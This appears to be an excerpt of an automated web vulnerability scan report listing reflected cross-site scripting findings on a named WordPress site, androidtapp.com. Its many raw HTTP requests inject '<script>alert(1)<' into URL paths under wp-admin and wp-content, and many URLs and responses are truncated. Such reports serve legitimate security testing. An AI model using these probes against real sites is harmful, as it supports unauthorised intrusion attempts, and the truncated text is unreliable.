GET /favicon.icoef3b2 Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Date: Fri, 01 Apr 2011 18:16:05 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Last-Modified: Fri, 01 Apr 2011 18:16:05 GMT Vary: Accept-Encoding, Cookie Expires: Fri, 01 Apr 2011 19:16:05 GMT Pragma: public Cache-Control: public, must-revalidate, proxy-revalidate ETag: b7dcdde953d73819bf4a Vary: User-Agent Content-Length: 55461 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /favicon.icoef3b2 |
GET /favicon.icoef3b2 Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:28 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:15:26 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: User-Agent Content-Length: 55496 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-admin/css/colors |
GET /wp-admin6de6e<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:55 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:53 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-admin/css/colors |
GET /wp-admin/css9fc92<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:17:09 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:17:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-admin/css/colors |
GET /wp-admin/css/colors Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:17:23 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:17:21 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-admin/css/login.css |
GET /wp-admina5c5f<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:53 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:50 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55422 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-admin/css/login.css |
GET /wp-admin/css7f7a5<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:17:20 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:17:18 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55422 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-admin/css/login.css |
GET /wp-admin/css/login.cssb7ff7<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:17:36 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:17:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55420 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-contenta584d<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:37 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:15:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55452 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content/pluginsfc0a9<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:49 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:15:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55452 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:09 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:07 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55452 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:28 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:23 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55452 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content9ee77<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:44 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:15:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55448 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins1dbff<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:05 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:04 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55448 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:35 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:28 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55448 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:17:12 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:17:04 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55448 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-contenta20a8<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:55 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:15:49 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55472 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content/pluginsf789e<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:13 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55472 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:46 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55472 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:17:11 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:17:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55472 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/themes |
GET /wp-content89904<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Date: Fri, 01 Apr 2011 18:16:40 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Last-Modified: Fri, 01 Apr 2011 18:16:40 GMT Vary: Accept-Encoding, Cookie Expires: Fri, 01 Apr 2011 19:16:40 GMT Pragma: public Cache-Control: public, must-revalidate, proxy-revalidate ETag: dd4e1e5189f7d24b8a1e Vary: User-Agent Content-Length: 55420 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/themes |
GET /wp-content/themes683ba<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Date: Fri, 01 Apr 2011 18:16:59 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Last-Modified: Fri, 01 Apr 2011 18:16:59 GMT Vary: Accept-Encoding, Cookie Expires: Fri, 01 Apr 2011 19:16:59 GMT Pragma: public Cache-Control: public, must-revalidate, proxy-revalidate ETag: 36dd09b715c1eefd82c0 Vary: User-Agent Content-Length: 55420 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/themes |
GET /wp-content/themes Host: www.androidtapp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Date: Fri, 01 Apr 2011 18:17:28 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Last-Modified: Fri, 01 Apr 2011 18:17:28 GMT Vary: Accept-Encoding, Cookie Expires: Fri, 01 Apr 2011 19:17:28 GMT Pragma: public Cache-Control: public, must-revalidate, proxy-revalidate ETag: 7c49d5b1c78130d3483e Vary: User-Agent Content-Length: 55420 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-content/themes |
GET /wp-content/themes Host: www.androidtapp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
